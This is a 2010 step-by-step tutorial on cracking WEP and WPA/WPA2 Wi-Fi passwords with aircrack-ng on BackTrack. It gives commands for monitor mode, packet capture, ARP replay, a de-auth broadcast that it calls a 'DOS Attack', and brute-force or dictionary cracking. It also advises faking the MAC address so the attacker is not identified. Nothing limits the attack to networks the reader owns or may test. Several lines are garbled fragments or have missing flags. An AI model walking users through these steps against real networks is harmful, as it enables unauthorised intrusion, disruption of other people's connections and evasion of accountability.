Hacking Encrypted Wireless Network Written by Fredrik Alm CompuTechSweden 2010 http://www.fredrik-alm.se/
REQUIREMENTS Software: Operating System: Linux kernel (Recommended: BackTrack 4 Final ) Download: Live CD (1570 MB) 3rd Party Software: aircrack-ng (Pre-Included in BackTrack) macchanger (Pre-Included in BackTrack) Hardware: Computer: A working standard Desktop/Laptop PC. (No Hard Drive Needed) Devices: A Linux compatible Wi-Fi device installed on your PC. Word Explanation AP = Access Point (Wi-Fi-Station) (ex. Router / Hack Target ) ## = A optional number (ex: 30 ) DEVICE = Computers Wi-Fi Device Card (ex: wlan0 ) BSSID = The AP:s MAC Address (ex: F4:32:B6:4C:DE:4A ) CHANNEL = The AP:s Active Wi-Fi Channel (ex: 6 WORDLIST = Path to a dictionary wordlist (ex: home/passwords.txt ) FAKEMAC = A optional faked MAC Address (ex: 00:11:22:33:44:66 ) CAPTUREFILE = The file were captured data is stored (ex: wepcapture- 01.cap ) Useful Keyboardshortcuts in Terminal Ctrl + C = In Terminal: Quitting an active process (ex: Datacapturing ) Key = Toggle between last used command.
Preparing: Wi-Fi Device Before attacking a wireless network, fake your MAC address on your Wi-Fi device to prevent users from logging your real ID. When experienced, use a complex faked MAC address so you don t reveal yourself. (Ex. 00:11:22:33:44:66 = Obvious for others but easy for you to remember.) (Ex. F4:32:B6:4C:DE:4A = Difficult to detect but hard for you to remember.) not, then type sudo -s in every terminal before executing commands.) # iwconfig Lists your compatible Wi-Fi Devices. Use this command to see the name of your device. Device name examples: wlan0, wifi0, eth0 # airmon-ng stop DEVICE Disables the monitor mode on your Wi-Fi device. # macchanger --mac FAKEMAC DEVICE Changes your MAC address to a optional fake MAC on your Wi-Fi device. # airmon-ng start DEVICE Enables the monitor mode on your Wi-Fi device.
Hacking: WEP Encryption Wired Equivalent Privacy (WEP) is an easily broken and therefore deprecated algorithm to secure wireless networks. This type of encryption can be directly Brute-Forced, without the need of a dictionary. When hacking, the attacker must capture a large amount of data, which later will be decrypted by brute-force to reveal the network password. When capturing more data, the chance of a successful decryption increases. To be on the safe side, capture 200 000+ packets and 500+ ARP: s. not, then type sudo -s in every terminal before executing the first command.) # airodump-ng DEVICE Lists all AP:s nearby, revealing their MAC addresses, active channels, encryption (ex. WEP / WPA) etc. - Terminal 2 # airodump-ng -c CHANNEL -w CAPTUREFILE --bssid BSSID DEVICE Captures and saves encypted data/packets from the network on your computer. - Terminal 3 # aireplay-ng -3 -b BSSID h FAKEMAC DEVICE Capturing APR:s from the AP and increases the speed of the speeds the capture., 2 or 3 # ls Displays all files and folders in the current directory (root). Look for the CAPTUREFILE (ex. wepcapture-01.cap) # aircrack-ng --bssid BSSID CAPTUREFILE Decrypts by Brute-force the captured data to finally reveal the network password.
Hacking: WPA/2 Encryption Wi-Fi Protected Access (WPA) is an more secure and therefore hardbroken algorithm to secure wireless networks. This type of encryption can t be directly Brute-Forced. After collection the so called WPA-Handshake, only a dictionary attack (wordlist with passwords) containing the correct password can break the encryption to reveal the network password. When capturing more data for a WPA-Handshake, it all depends on authorized computers to the network. It s when a computer connects to the network, that the WPA-Handshake can be captured. This can be helped with the De-Auth process in the following commands. Before hacking, download a big and good wordlist from the internet to use with the decryption. not, then type sudo -s in every terminal before executing the first command.) # airodump-ng DEVICE Lists all AP:s nearby, revealing their MAC addresses, active channels, encryption (ex. WEP / WPA) etc. - Terminal 2 # airodump-ng -c CHANNEL -w CAPTUREFILE --bssid BSSID DEVICE Captures and saves encypted data/packets from the network on your computer. - Terminal 3 # aireplay-ng -0 ## -a BSSID DEVICE Sends out a De-Auth Broadcast (DOS Attack) to force all computers on the wireless network to perform a reconnect. If successful, this might help capture the WPA-Handshake., 2 or 3 # ls Displays all files and folders in the current directory (root). Look for the CAPTUREFILE (ex. wpacapture-01.cap) # aircrack-ng CAPTUREFILE WORDLIST Decrypts by Dictionary the captured data to finally reveal the network password.